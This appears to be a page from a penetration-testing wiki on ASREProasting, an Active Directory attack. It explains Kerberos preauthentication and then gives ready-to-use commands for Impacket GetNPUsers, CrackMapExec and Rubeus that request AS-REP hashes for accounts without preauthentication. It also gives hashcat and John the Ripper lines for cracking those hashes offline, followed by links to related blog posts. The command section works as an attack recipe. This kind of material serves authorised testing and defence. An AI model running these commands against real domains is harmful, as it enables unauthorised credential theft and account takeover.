ASREProast

Theory
When asking the KDC (Key Distribution Center) for a TGT (Ticket Granting Ticket), the requesting user needs to send a piece of information (a timestamp) encrypted with it's own credentials. It ensures the user is requesting a TGT for himself. This is called Kerberos preauthentication.
The TGT is then sent to the user in the KRB_AS_REP message, but that message also contains a session key. That session key is encrypted with the requested user's NT hash.
Kerberos preauthentication prevents attackers from requesting a TGT for any user, receive the KRB_AS_REP message, extract the session key and crack it offline in an attempt to retrieve that user's password.
Because some applications don't support Kerberos preauthentication, it is common to find users with Kerberos preauthentication disabled, hence allowing attackers to request TGTs for these users and crack the session keys offline. This is ASREProasting.
Practice
While this attack can be carried out without any prior foothold (domain user credentials), there is no way of finding out users with Do not require Kerberos preauthentication set without that prior foothold.
UNIX-like
Windows
UNIX-like
The Impacket script GetNPUsers (Python) can get TGTs for the users that have the property Do not require Kerberos preauthentication set.
# users list dynamically queried with an LDAP anonymous bind
GetNPUsers.py -request -format hashcat -outputfile ASREProastables.txt -dc-ip $KeyDistributionCenter 'DOMAIN/'
​
# with a users file
GetNPUsers.py -usersfile users.txt -request -format hashcat -outputfile ASREProastables.txt -dc-ip $KeyDistributionCenter 'DOMAIN/'
​
# users list dynamically queried with a LDAP authenticated bind (password)
GetNPUsers.py -request -format hashcat -outputfile ASREProastables.txt -dc-ip $KeyDistributionCenter 'DOMAIN/USER:Password'
​
# users list dynamically queried with a LDAP authenticated bind (NT hash)
GetNPUsers.py -request -format hashcat -outputfile ASREProastables.txt -hashes 'LMhash:NThash' -dc-ip $KeyDistributionCenter 'DOMAIN/USER'
This can also be achieved with CrackMapExec (Python).
crackmapexec ldap $TARGETS -u $USER -p $PASSWORD --asreproast ASREProastables.txt --KdcHost $KeyDistributionCenter
Windows
The same thing can be done with Rubeus from a session running with a domain user privileges.
Rubeus.exe asreproast  /format:hashcat /outfile:ASREProastables.txt
Depending on the output format used (hashcat or john), hashcat and JohnTheRipper can be used to try cracking the hashes.
hashcat -m 18200 -a 0 ASREProastables.txt $wordlist
john --wordlist=$wordlist ASREProastables.txt
Resources
@_xpn_ - Kerberos AD Attacks - More Roasting with AS-REP
This post continues with the series of tutorials looking at Kerberos and Active Directory attacks. If you have not had chance to review any of the previous posts in this series, I'd recommend checking them out:   * Kerberos AD Attacks - Kerberoasting    [https://blog.xpnsec.com/kerberos-attacks-part-1/]  * Using machine account credentials during an engagement    [https://blog.xpnsec.com/using-machine-accounts-during-an-engagement/]  * Setting Service Principal Names To Roast Accounts    [https:
blog.xpnsec.com
Roasting AS-REPs
Last November, I published a post titled “Kerberoasting Without Mimikatz” that detailed new developments with PowerView and Tim Medin’s Kerberoasting attack. This started me down …
www.harmj0y.net
Kerberos Pre-Authentication: Why It Should Not Be Disabled - TechNet Articles - United States (English) - TechNet Wiki
Technical articles, content and resources for IT Professionals working in Microsoft technologies
social.technet.microsoft.com
Kerberos in Active Directory
Kerberos is a protocol that allows users to authenticate on the network, and access services once authenticated. This post explains how it works.
en.hackndo.com
Pass the ticket
Kerberoast
Last updated 2 days ago